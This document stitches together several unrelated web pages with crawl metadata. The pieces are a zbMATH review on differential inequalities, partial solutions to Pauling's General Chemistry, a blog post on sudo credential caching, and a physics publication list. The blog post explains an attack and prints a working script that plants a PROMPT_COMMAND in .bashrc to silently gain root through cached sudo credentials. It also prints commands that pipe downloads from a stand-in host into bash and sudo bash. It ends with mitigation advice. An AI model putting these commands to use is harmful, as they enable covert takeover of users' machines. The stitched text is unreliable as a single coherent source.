This page titled 4.10: Formulas is shared under a CC BY-SA 4.0 license and was authored, remixed, and/or curated by Danielle Navarro via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request. | 2022-08-13 06:13:02 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8974347710609436, "perplexity": 849.1839454524722}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571909.51/warc/CC-MAIN-20220813051311-20220813081311-00373.warc.gz"} |
https://zbmath.org/?q=an:0856.34019 | # zbMATH — the first resource for mathematics
Systems of conditional differential inequalities of Kato type. (English. Russian original) Zbl 0856.34019
Sib. Math. J. 35, No. 6, 1109-1118 (1994); translation from Sib. Mat. Zh. 35, No. 6, 1253-1263 (1994).
This paper is concerned with the extension of some results of J. Kato on differential inequalities from the scalar case to the $$k$$-dimensional case.
##### MSC:
34A40 Differential inequalities involving functions of a single real variable
##### Keywords:
differential inequalities
Full Text:
##### References:
[1] V. Laksmikantham and S. Leela, Differential and Integral Inequalities. Vol. 2, Acad. Press, New York (1969). [2] B. S. Razumikhin, ”On stability of systems with delay,” Prikl. Mat. Mekh.,20, No. 3, 513–518 (1956). [3] B. S. Razumikhin, Stability of Hereditary Systems [in Russian], Nauka, Moscow (1988). [4] J. Kato, ”On Liapunov-Razumikhin type theorems for functional differential equations,” Funct. Ekvac.,16, No. 2, 225–239 (1973). · Zbl 0321.34056 [5] V. M. Matrosov, ”Comparison principle with the Lyapunov vector-function,” Differentsial’nye Uravneniya, I:4, No. 8, 1374–1386; No. 10, 1739–1752 (1968); II:5, No. 7, 1171–1185; No. 12, 2129–2143 (1969). · Zbl 0182.42303 [6] V. M. Matrosov, S. N. Vasil’ev, R. I. Kozlov et al., Inference Algorithms for the Theorems of the Lyapunov-Vector-Function Method [in Russian], Nauka, Novosibirsk (1981). [7] N. A. Karatueva, ”The Lyapunov-vector-function method for systems with aftereffect,” in: Differential Equations and Numerical Methods [in Russian], Nauka, Novosibirsk, 1986, pp. 62–72. · Zbl 0612.34072 [8] V. M. Matrosov, ”On differential equations and inequalities with discontinuous right-hand sides,” Differentsial’nye Uravneniya, I:3, No. 3, 395–409; II:3, No. 5, 839–848 (1967). · Zbl 0166.34104 [9] R. I. Kozlov, ”To the theory of differential equations and inequalities with discontinuous righthand sides,” Differentsial’nye Uravneniya,10, No. 12, 1264–1275 (1974). [10] R. I. Kozlov, ”Vector Lyapunov functions with nontemporal comparison systems and their use in analysis of systems with perturbations,” in: Dynamics of Nonlinear Systems [in Russian], Nauka, Novosibirsk, 1983, pp. 57–78. [11] V. D. Ponomarëv, ”Absolute upper semicontinuity,” Mat. Zametki,22, No. 3, 395–399 (1977). [12] R. I. Kozlov, ”Conditional differential inequalities and their application to qualitative analysis of systems with aftereffect by the Lyapunov-Razumikhin-vector-function method,” in: Abstracts: Qualitative Theory of Differential Equations [in Russian], Riga, 1989, p. 123.
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching. | 2021-12-07 19:18:30 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35068920254707336, "perplexity": 4871.151583825259}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363405.77/warc/CC-MAIN-20211207170825-20211207200825-00045.warc.gz"} |
https://en.wikibooks.org/wiki/Solutions_to_General_Chemistry_(Linus_Pauling)/The_Nature_and_Properties_of_Matter | # Solutions to General Chemistry (Linus Pauling)/The Nature and Properties of Matter
## 1-1
What is the difference between matter and radiant energy?
The essential distinction between these two forms of mass-energy is that matter moves at a velocity of less than the speed of light, and that radiant energy moves at the speed of light.
## 1-2
What is the Einstein relation between mass and energy? Indicate the IS units of the terms in this relation. This is of course the cliched ${\displaystyle E=mc^{2}}$. In terms of IS units, the equation reads:
${\displaystyle \mathrm {J} =\mathrm {kg} \cdot \left({\frac {\mathrm {m} }{\mathrm {s} }}\right)^{2}}$
Note that the term ${\displaystyle \mathrm {J} }$ (for joules) on the left hand resolves to:
${\displaystyle \mathrm {N} \cdot \mathrm {m} =\mathrm {kg} \cdot {\frac {\mathrm {m} }{\mathrm {s} ^{2}}}\cdot \mathrm {m} =\mathrm {kg} \cdot \left({\frac {\mathrm {m} }{\mathrm {s} }}\right)^{2}}$
As such the units are equal on either side, as required.
## 1-3
Approximately how much energy, in IS units, is needed to raise 1 liter (1 kg) of liquid water from 273.15°K to 373.15°K? (See the discussion of the calorie, Section 1-3.)
The answer will have to be written in joules. However, the most convenient unit for the purposes of calculation is the thermochemical calorie, which is equal to 4.184 J. The thermochemical calorie, in turn, is slightly smaller than the 15°C calorie, the unit of energy required to raise the temperature of a gram of water from 14.5 to 15.5°C at standard temperature. Since only an approximate answer is needed, though, simply bear in mind that the Kelvin and the Celsius scale have the same magnitude. Then the required number of (thermochemical) calories is 100,000 thermochemical calories, or 418,400 joules (418.4 kJ).
## 1-4
Verify the following... To convert celsius to farenheight we must multiply by 1.8 and addition 32, to convert farenheight to celsius we must substract 32 and then divide by 1.8.
## 1-5
Mercury freezes at -40°C. What is its freezing point on the Fahrenheit scale?
-40°F (the only temperature which is the same on both scales).
## 1-6
For each of the following systems systems ([1]) state how many phases are present in the system; ([2]) state for each phase whether it is a pure substance or a mixture; ([3]) give the constituents of the system; ([4]) give a set of components for system:
1. A flask containing a saturated aqueous solution of salt and several crystals of salt.
1. Two.
2. The aqueous phase is a mixture, as it contains water and salt. The solid phase, however, can be considered a pure substance.
3. The constituents are the aqueous and solid phases of salt.
4. The components are salt and water.
2. An evacuated, sealed quartz tube of 100-ml volume containing 10 g of pure zinc heated until about one half the zinc is melted.
1. Disregarding the quartz tube itself, there are two phases present in the system.
2. Both phases exist in the form of pure substances.
3. The constituents are the liquid and solid phases of zinc.
4. There is one component, zinc.
3. As ([2]) , but containing 10 g of a copper-gold alloy instead of 10 g of zinc.
1. There are two phases in the system (using the same assumption regarding the container as before).
2. Both phases are mixtures, specifically, alloys.
3. The constituents are the liquid and solid phases of the copper-gold alloy.
4. There are two components, copper and gold.
## 1-7
What is meant by "intrinsic property" of a substance? Are odor, shape, density, color, weight, taste, luster, area, magnetic susceptibility, and heat capacity intrinsic properties? Which of these are properties that can be quantitatively measured?
An intrinsic property of a substance is one which is not significantly affected by the size of any given amount of the substance, or its state of subdivision. In other words, a mountain of pulverized salt (sodium chloride) shares in common with a baseball-sized salt crystal certain invariant, intrinsic properties, such as density and cleavage. The color of a substance is an important physical property. It is interesting to note that the apparent color of a substance depends upon its state of subdivision: the color becomes lighter as large particles are ground up into smaller ones, because the distance through which the light penetrates before it is reflected back from the interfaces (surfaces) becomes less as the particles become smaller.
Odor, density, color, taste, magnetic susceptibility and heat capacity are intrinsic properties, though odor and color may be somewhat magnified when the material is finely subdivided. Shape, weight and area are not intrinsic, since they depend on the amount of material.
Density, color, weight, area, magnetic susceptibility and heat capacity can be quantitatively measured. | 2021-04-10 15:24:19 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 4, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7409032583236694, "perplexity": 1267.3709168808919}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038057142.4/warc/CC-MAIN-20210410134715-20210410164715-00417.warc.gz"} |
https://martin-ueding.de/posts/sudo-timeout-risk/ | # The dangers of sudo timeout
Ubuntu is configured by default to cache the user's credentials for a couple minutes after a successful use of sudo. This is very comfortable. When you enter a couple commands in succession, you do not have to enter the password every single time. Take the following:
sudo apt-get update
If the sudo authentication would not be cached, you would have to enter your password three times.
## The hidden text
There is a danger to this. One often finds code snippets on the internet which will tell you to perform some commands like the apt-get commands up there. There is a very subtle trick to smuggle in something you did not see. Take the following text. Mark it with your mouse, copy and paste it in the text field right below. You can also paste it into your terminal, this snippet is not malicious.
echo I have copied this from the DANGEROUS internet.
Did the word DANGEROUS show up? If not, your browser is smarter than mine. Now an attacker can do the following. First he will tell you to run something innocent like sudo apt-get update. You enter your password and your credentials are cached. Then after a few other innocent commands he will prepare something like the following:
something; curl example.com/dangerous.sh | sudo bash; something
The part between the ; will be hidden, of course. You would only see something; something which looks good to you. The dangerous.sh will contain some malicious payload which is then directly executed as root.
Some malicious things I could think of:
• Set up a cron job to download more payload every day. You never know what you might want to do with a hacked computer, right?
• Add your own package repository to the system. Then you can even "update" packages on the machine and the user will think that he is installing legitimate update. openSUSE's zypper will tell you about those "vendor changes" which is a very good thing.
• Create yourself a user account on the machine and do something funny with it.
• Change the root password, remove all other users from the sudoers file and adm group. Then demand a ransom. If you have bad luck, the user knows how to use a Live CD and not to trust a compromised system.
So I have shown you a way to get superuser access to a computer with the sudo timeout when you get the user to paste something into his terminal session where the credentials are cached. But some users might be more careful. They might know about the credential caching and only copy code from the internet when it does not involve sudo. One can still get them with the timeout. It is just a tad harder.
The sudo credential caching usually only works within the active session. So when you open a second terminal window and execute something with sudo, you will have to type the password again. Otherwise you could simply have some process lurking in the background and try to call sudo every minute to see whether the timeout is activated.
One needs to sneak into the currently active terminal window. It is not hard and I will show you how easy it is to do. First one needs to upload a script like the following to say example.com/mount_attack.sh:
#!/bin/bash
echo 'PROMPT_COMMAND="sudo -n ~/.try_root.sh &> /dev/null && echo Owned!"' >> ~/.bashrc
cat > ~/.try_root.sh <<EOF
#!/bin/bash
touch /tmp/owned
EOF
chmod +x ~/.try_root.sh
Using the method described above, get the user to execute something like curl example.com/mount_attack.sh | bash. Since no superuser permissions are involved, there is no waiting or dependence on the timeout.
The next time the user opens up a terminal, the new .bashrc will be read. The PROMPT_COMMAND is executed before the prompt is displayed. The -n flag lets sudo run in non-interactive mode. It will just fail if the credentials are not cached. All output is suppressed, so the user will not notice anything.
Once the superuser credentials are cached in the current session, the PROMPT_COMMAND will be able to execute the .try_root.sh script which will then dig into the system and make itself at home. It could do all the things that I have mentioned above.
In a real attack, one would obfuscate the names of all things involved. After gaining superuser access it would be a good idea to remove the traces within the home directory.
## Mitigation
One should be able to protect themselves from this. You can do this in layers.
• Disable the sudo timeout completely. This can be done by adding the following line to /etc/sudoers:
Defaults timestamp_timeout=0
Instead you can use sudo -i to obtain a root login shell to type all the commands without sudo. This is more secure than using sudo -s since that uses the .bashrc of root instead of your own. An attack I just showed you here should be possible against the use of sudo -s as well. Just wait until the user ID changes to 0 and launch your code.
• Do not copy & paste code from websites directly into your shell. Paste it into an editor window instead and look what it does. Alternatively you could type the commands yourself as well.
Regularly scanning files like .bashrc for those kind of things are probably not really doing any good. The attacker would just remove all the traces once the attack is launched. There are so many attack vectors, cleaning up is probably not worth the effort. Rather invest in security up front by being cautious. | 2020-07-11 08:12:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1736978441476822, "perplexity": 1681.5541336548827}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655924908.55/warc/CC-MAIN-20200711064158-20200711094158-00040.warc.gz"} |
https://scholar.harvard.edu/efthimios_kaxiras/publications?page=5%2C0%2C0%2C0%2C0%2C3 | # Publications
2016
Montemore M, Hoyt R, Kaxiras E. Non-adiabatic effects and electronic excitations during dissociation on catalytic surfaces. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;252.
Montemore M, Hoyt R, Kaxiras E. Non-adiabatic energy dissipation in dissociation on catalytic surface. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;251.
Karakalos S, Xu Y, Kabeer FC, Chen W, Rodriguez-Reyes JCF, Tkatchenko A, Kaxiras E, Madix RJ, Friend CM. Noncovalent Bonding Controls Selectivity in Heterogeneous Catalysis: Coupling Reactions on Gold. JOURNAL OF THE AMERICAN CHEMICAL SOCIETY. 2016;138 (46) :15243-15250.Abstract
Enhancing the selectivity of catalytic processes has potential for substantially increasing the sustainability of chemical production. Herein, we establish relationships between reaction selectivity and molecular structure for a homologous series of key intermediates for oxidative coupling of alcohols on gold using a combination of experiment and theory. We establish a scale of binding for molecules with different alkyl structures and chain lengths and thereby demonstrate the critical nature of noncovalent van der Waals interactions in determining the selectivity by modulating the stability of key reaction intermediates bound to the surface. The binding hierarchy is the same for Au(111) and Au(110), which demonstrates a relative lack of sensitivity to the surface structure. The hierarchy of binding established in this work provides guiding principles for predicting how molecular structure affects the competition for binding sites more broadly. Besides the nature of the primary surface-molecule bonding, three additional factors that affect the stabilities of the reactive intermediates are clearly established: (1) the number of C atoms in the alkyl chain, (2) the presence of C-C bond unsaturation, and (3) the degree of branching of the alkyl group of the adsorbed molecules. We suggest that this is a fundamental principle that is generally applicable to a broad range of reactions on metal catalysts.
Tritsaris GA, Shirodkar SN, Kaxiras E, Cazeaux P, Luskin M, Plechac P, Cances E. Perturbation theory for weakly coupled two-dimensional layers. JOURNAL OF MATERIALS RESEARCH. 2016;31 (7) :959-966.Abstract
A key issue in two-dimensional structures composed of atom-thick sheets of electronic materials is the dependence of the properties of the combined system on the features of its parts. Here, we introduce a simple framework for the study of the electronic structure of layered assemblies based on perturbation theory. Within this framework, we calculate the band structure of commensurate and twisted bilayers of graphene (Gr) and hexagonal boron nitride (h-BN), and of a Gr/h-BN heterostructure, which we compare with reference full-scale density functional theory calculations. This study presents a general methodology for computationally efficient calculations of two-dimensional materials and also demonstrates that for relatively large twist in the graphene bilayer, the perturbation of electronic states near the Fermi level is negligible.
Kolesov G, Granas O, Hoyt R, Vinichenko D, Kaxiras E. Real-Time TD-DFT with Classical Ion Dynamics: Methodology and Applications. JOURNAL OF CHEMICAL THEORY AND COMPUTATION. 2016;12 (2) :466-476.Abstract
We present a method for real-time propagation of electronic wave functions, within time-dependent density functional theory (RT-TDDFT), coupled to ionic motion through mean-field classical dynamics. The goal of our method is to treat large systems and complex processes, in particular photocatalytic reactions and electron transfer events on surfaces and thin films. Due to the complexity of these processes, computational approaches are needed to provide insight into the underlying physical mechanisms and are therefore crucial for the rational design of new materials. Because of the short time step required for electron propagation (of order similar to 10 attoseconds), these simulations are computationally very demanding. Our methodology is based on numerical atomic-orbital-basis sets for computational efficiency. In the computational package, to which we refer as TDAP-2.0 (Time-evolving Deterministic Atom Propagator), we have implemented a number of important features and analysis tools for more accurate and efficient treatment of large, complex systems and time scales that reach into a fraction of a picosecond. We showcase the capabilities of our method using four different examples: (i) photodissociation into radicals of opposite spin, (ii) hydrogen adsorption on aluminum surfaces, (iii) optical absorption of spin-polarized organic molecule containing a metal ion, and (iv) electron transfer in a prototypical dye sensitized solar cell.
Hiebel F, Shong B, Chen W, Madix RJ, Kaxiras E, Friend CM. Self-assembly of acetate adsorbates drives atomic rearrangement on the Au(110) surface. NATURE COMMUNICATIONS. 2016;7.Abstract
Weak inter-adsorbate interactions are shown to play a crucial role in determining surface structure, with major implications for its catalytic reactivity. This is exemplified here in the case of acetate bound to Au(110), where the small extra energy of the van der Waals interactions among the surface-bound groups drives massive restructuring of the underlying Au. Acetate is a key intermediate in electro-oxidation of CO2 and a poison in partial oxidation reactions. Metal atom migration originates at surface defects and is likely facilitated by weakened Au-Au interactions due to bonding with the acetate. Even though the acetate is a relatively small molecule, weak intermolecular interaction provides the energy required for molecular self-assembly and reorganization of the metal surface.
Defo RK, Fang S, Shirodkar SN, Tritsaris GA, Dimoulas A, Kaxiras E. Strain dependence of band gaps and exciton energies in pure and mixed transition-metal dichalcogenides. PHYSICAL REVIEW B. 2016;94 (15).Abstract
{{The ability to fabricate 2D device architectures with desired properties, based on stacking of weakly (van der Waals) interacting atomically thin layers, is quickly becoming reality. In order to design ever more complex devices of this type, it is crucial to know the precise strain and composition dependence of the layers' electronic and optical properties. Here, we present a theoretical study of these dependences for monolayers with compositions varying from pure MX2 to the mixed MXY, where M = Mo, W and X
S. S. Schoenholz, Cubuk ED, Sussman DM, Kaxiras E, Liu AJ. A structural approach to relaxation in glassy liquids. NATURE PHYSICS. 2016;12 (5) :469+.Abstract
In contrast with crystallization, there is no noticeable structural change at the glass transition. Characteristic features of glassy dynamics that appear below an onset temperature, T-0 (refs 1-3), are qualitatively captured by mean field theory(4-6), which assumes uniform local structure. Studies of more realistic systems have found only weak correlations between structure and dynamics(7-11). This raises the question: is structure important to glassy dynamics in three dimensions? We answer this question affirmatively, using machine learning to identify a new field, softness' which characterizes local structure and is strongly correlated with dynamics. We find that the onset of glassy dynamics at T-0 corresponds to the onset of correlations between softness (that is, structure) and dynamics. Moreover, we construct a simple model of relaxation that agrees well with our simulation results, showing that a theory of the evolution of softness in time would constitute a theory of glassy dynamics.
Cubuk ED, Schoenholz SS, Kaxiras E, Liu AJ. Structural Properties of Defects in Glassy Liquids. JOURNAL OF PHYSICAL CHEMISTRY B. 2016;120 (26) :6139-6146.Abstract
At zero temperature a disordered solid corresponds to a local minimum in the energy landscape. As the temperature is raised or the system is driven with a mechanical load, the system explores different minima via dynamical events in which particles rearrange their relative positions. We have shown recently that the dynamics of particle rearrangements are strongly correlated with a structural quantity associated with each particle, softness'', which we can identify using supervised machine learning. Particles of a given softness have a well-defined energy scale that governs local rearrangements; because of this property, softness greatly simplifies our understanding of glassy dynamics. Here we investigate the correlation of softness with other commonly used structural quantities, such as coordination number and local potential energy. We show that although softness strongly correlates with these properties, its predictive power for rearrangement dynamics is much higher. We introduce a useful metric for quantifying the quality of structural quantities as predictors of dynamics. We hope that, in the future, authors introducing new structural measures of dynamics will compare their proposals quantitatively to softness using this metric. We also show how softness correlations give insight into rearrangements. Finally, we explore the physical meaning of softness using unsupervised dimensionality reduction and reduced curve-fitting, models, and show that softness can be recast in a form that is amenable to analytical treatment.
Montemore M, Kaxiras E. Structure and reactivity of AgAu Alloys. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;251.
Cao Y, Luo JY, Fatemi V, Fang S, Sanchez-Yamagishi JD, Watanabe K, Taniguchi T, Kaxiras E, Jarillo-Herrero P. Superlattice-Induced Insulating States and Valley-Protected Orbits in Twisted Bilayer Graphene. PHYSICAL REVIEW LETTERS. 2016;117 (11).Abstract
Twisted bilayer graphene (TBLG) is one of the simplest van der Waals heterostructures, yet it yields a complex electronic system with intricate interplay between moire physics and interlayer hybridization effects. We report on electronic transport measurements of high mobility small angle TBLG devices showing clear evidence for insulating states at the superlattice band edges, with thermal activation gaps several times larger than theoretically predicted. Moreover, Shubnikov-de Haas oscillations and tight binding calculations reveal that the band structure consists of two intersecting Fermi contours whose crossing points are effectively unhybridized. We attribute this to exponentially suppressed interlayer hopping amplitudes for momentum transfers larger than the moire wave vector.
Heller EJ, Yang Y, Kocia L, Chen W, Fang S, Borunda M, Kaxiras E. Theory of Graphene Raman Scattering. ACS NANO. 2016;10 (2) :2803-2818.Abstract
Raman scattering plays a key role in unraveling the quantum dynamics of graphene, perhaps the most promising material of recent times. It is crucial to correctly interpret the meaning of the spectra. It is therefore very surprising that the widely accepted understanding of Raman scattering, i.e., Kramers Heisenberg Dirac theory, has never been applied to graphene. Doing so here, a remarkable mechanism we term''transition sliding'' is uncovered, explaining the uncommon brightness of overtones in graphene. Graphene's dispersive and fixed Raman bands, missing bands, defect density and laser frequency dependence of band intensities, widths of overtone bands, Stokes, anti -Stokes anomalies, and other known properties emerge simply and directly.
2015
Fang S, Defo RK, Shirodkar SN, Lieu S, Tritsaris GA, Kaxiras E. Ab initio tight-binding Hamiltonian for transition metal dichalcogenides. PHYSICAL REVIEW B. 2015;92 (20).Abstract
We present an accurate ab initio tight-binding Hamiltonian for the transition metal dichalcogenides, MoS2, MoSe2, WS2, WSe2, with a minimal basis (the d orbitals for the metal atoms and p orbitals for the chalcogen atoms) based on a transformation of theKohn-Sham density functional theory Hamiltonian to a basis of maximally localized Wannier functions. The truncated tight-binding Hamiltonian, with only on-site, first, and partial second neighbor interactions, including spin-orbit coupling, provides a simple physical picture and the symmetry of the main band-structure features. Interlayer interactions between adjacent layers are modeled by transferable hopping terms between the chalcogen p orbitals. The full-range tight-binding Hamiltonian can be reduced to hybrid-orbital k . p effective Hamiltonians near the band extrema that capture important low-energy excitations. These ab initio Hamiltonians can serve as the starting point for applications to interacting many-body physics including optical transitions and Berry curvature of bands, of which we give some examples.
Kolesov G, Vinichenko D, Tritsaris GA, Friend CM, Kaxiras E. Anatomy of the Photochemical Reaction: Excited-State Dynamics Reveals the C-H Acidity Mechanism of Methoxy Photo-oxidation on Titania. JOURNAL OF PHYSICAL CHEMISTRY LETTERS. 2015;6 (9) :1624-1627.Abstract
Light-driven chemical reactions on semiconductor surfaces have potential for addressing energy and pollution needs through efficient chemical synthesis; however, little is known about the time evolution of excited states that determine reaction pathways. Here, we study the photo-oxidation of methoxy (CH3O) derived from methanol on the rutile TiO2(110) surface using ab initio simulations to create a molecular movie of the process. The movie sequence reveals a wealth of information on the reaction intermediates, time scales, and energetics. The reaction is broken in three stages, described by Lewis structures directly derived from the hole'' wave functions that lead to the concept of `photoinduced C-H acidity''. The insights gained from this work can be generalized to a set of simple rules that can predict the efficiency of photo-oxidation reactions in reactant-catalyst pairs.
Cubuk ED, S. S. Schoenholz, Rieser JM, Malone BD, Rottler J, Durian DJ, Kaxiras E, Liu AJ. Identifying Structural Flow Defects in Disordered Solids Using Machine-Learning Methods. PHYSICAL REVIEW LETTERS. 2015;114 (10).Abstract
We use machine-learning methods on local structure to identify flow defects-or particles susceptible to rearrangement-in jammed and glassy systems. We apply this method successfully to two very different systems: a two-dimensional experimental realization of a granular pillar under compression and a Lennard-Jones glass in both two and three dimensions above and below its glass transition temperature. We also identify characteristics of flow defects that differentiate them from the rest of the sample. Our results show it is possible to discern subtle structural features responsible for heterogeneous dynamics observed across a broad range of disordered materials.
Huang D, Song C-L, Webb TA, Fang S, Chang C-Z, Moodera JS, Kaxiras E, Hoffman JE. Revealing the Empty-State Electronic Structure of Single-Unit-Cell FeSe/SrTiO3. PHYSICAL REVIEW LETTERS. 2015;115 (1).Abstract
We use scanning tunneling spectroscopy to investigate the filled and empty electronic states of superconducting single-unit-cell FeSe deposited on SrTiO3(001). We map the momentum-space band structure by combining quasiparticle interference imaging with decay length spectroscopy. In addition to quantifying the filled-state bands, we discover a Gamma-centered electron pocket 75 meV above the Fermi energy. Our density functional theory calculations show the orbital nature of empty states at Gamma and explain how the Se height is a key tuning parameter of their energies, with broad implications for electronic properties.
Huang D, Song C-L, Webb TA, Fang S, Chang C-Z, Moodera JS, Kaxiras E, Hoffman JE. Revealing the Empty-State Electronic Structure of Single-Unit-Cell FeSe /SrTiO3. Physical Review Letters. 2015;115 :017002.Abstract
We use scanning tunneling spectroscopy to investigate the filled and empty electronic states of superconducting single-unit-cell FeSe deposited on SrTiO3(001). We map the momentum-space band structure by combining quasiparticle interference imaging with decay length spectroscopy. In addition to quantifying the filled-state bands, we discover a Γ-centered electron pocket 75 meV above the Fermi energy. Our density functional theory calculations show the orbital nature of empty states at Γ and explain how the Se height is a key tuning parameter of their energies, with broad implications for electronic properties.
Ostadhossein A, Cubuk ED, Tritsaris GA, Kaxiras E, Zhang S, van Duin ACT. Stress effects on the initial lithiation of crystalline silicon nanowires: reactive molecular dynamics simulations using ReaxFF. Physical Chemistry Chemical Physics. 2015;17 :3832-3840.Abstract
Silicon (Si) has been recognized as a promising anode material for the next-generation high-capacity lithium (Li)-ion batteries because of its high theoretical energy density. Recent in situ transmission electron microscopy (TEM) revealed that the electrochemical lithiation of crystalline Si nanowires
(c-SiNWs) proceeds by the migration of the interface between the lithiated Si (LixSi) shell and the pristine unlithiated core, accompanied by solid-state amorphization. The underlying atomic mechanisms of Li insertion into c-Si remain poorly understood. Herein, we perform molecular dynamics (MD) simulations using the reactive force field (ReaxFF) to characterize the lithiation process of c-SiNWs. Our calculations show that ReaxFF can accurately reproduce the energy barriers of Li migration from DFT calculations in
both crystalline (c-Si) and amorphous Si (a-Si). The ReaxFF-based MD simulations reveal that Li insertion into interlayer spacing between two adjacent (111) planes results in the peeling-off of the (111) facets and subsequent amorphization, in agreement with experimental observations. We find that breaking of the Si–Si bonds between (111)-bilayers requires a rather high local Li concentration, which explains the atomically sharp amorphous–crystalline interface (ACI). Our stress analysis shows that lithiation induces compressive stress at the ACI layer, causing retardation or even the stagnation of the reaction front, also in good agreement with TEM observations. Lithiation at high temperatures (e.g. 1200 K) shows that Li insertion into c-SiNW results in an amorphous to crystalline phase transformation at Li : Si composition
of B4.2 : 1. Our modeling results provide a comprehensive picture of the effects of reaction and diffusion-induced stress on the interfacial dynamics and mechanical degradation of SiNW anodes under chemo-mechanical lithiation.
Kolesov G, Vinichenko D, Tritsaris GA, Friend CM, Kaxiras E. Anatomy of the Photochemical Reaction: Excited-State Dynamics Reveals the C−H Acidity Mechanism of Methoxy Photo-oxidation on Titania. Journal of Physical Chemistry Letters. 2015;6 :1624-1627.Abstract
Light-driven chemical reactions on semiconductor surfaces have potential for
addressing energy and pollution needs through efficient chemical synthesis; however, little is known about the time evolution of excited states that determine reaction pathways. Here, we study the photo-oxidation of methoxy (CH3O) derived from methanol on the rutile TiO2(110) surface using ab initio simulations to create a molecular movie of the process. The movie sequence reveals a wealth of information on the reaction intermediates, time scales, and energetics. The reaction is broken in three stages, described by Lewis structures directly derived from the “hole” wave functions that lead to the concept of “photoinduced C−H acidity”. The insights gained from this work can be generalized to a set of simple rules that can predict the efficiency of photo-oxidation reactions in reactant−catalyst pairs.
Chen W, Cui P, Zhu W, Kaxiras E, Gao Y, Zhang Z. Atomistic mechanisms for bilayer growth of graphene on metal substrates. Physical Review B. 2015;91 :045408.Abstract
Epitaxial growth on metal substrates has been shown to be the most powerful approach in producing large-scale high-quality monolayer graphene, yet it remains a major challenge to realize uniform bilayer graphene growth. Here we carry out a comparative study of the atomistic mechanisms for bilayer graphene growth on the (111) surfaces of Cu and Ni, using multiscale approaches combining first-principles calculations and rate-equation analysis. We first show that the relatively weak graphene-Cu interaction enhances the lateral diffusion and effective nucleation of C atoms underneath the graphene island, thereby making it more feasible to grow bilayer graphene on Cu. In contrast, the stronger graphene-Ni interaction suppresses the lateral mobility and dimerization of C atoms underneath the graphene, making it unlikely to achieve controlled growth of bilayer graphene on Ni. We then determine the critical graphene size beyond which nucleation of the second layer will take place. Intriguingly, the critical size exhibits an effective inverse “Ehrlich-Schwoebel barrier” effect, becoming smaller
